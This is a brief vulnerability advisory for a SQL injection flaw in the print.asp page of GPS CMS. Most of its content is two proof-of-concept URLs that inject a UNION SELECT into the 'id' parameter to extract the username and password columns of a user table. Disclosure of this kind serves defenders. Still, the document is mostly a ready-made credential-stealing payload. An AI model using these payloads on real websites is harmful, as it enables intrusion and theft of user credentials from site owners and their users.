GPS CMS Print.ASP SQL Injection Vulnerability

GPS CMS Print.ASP SQL Injection Vulnerability

Attackers can exploit this issue via a web client.

The following proof-of-concept URIs are available:

http://www.example.com/print.asp?id=-1%20union%20select%200,0,0,Benutzername,0%20from%20userdb%20where%20ID=10
http://www.example.com/print.asp?id=-1%20union%20select%200,0,0,Passwort,0%20from%20userdb%20where%20ID=10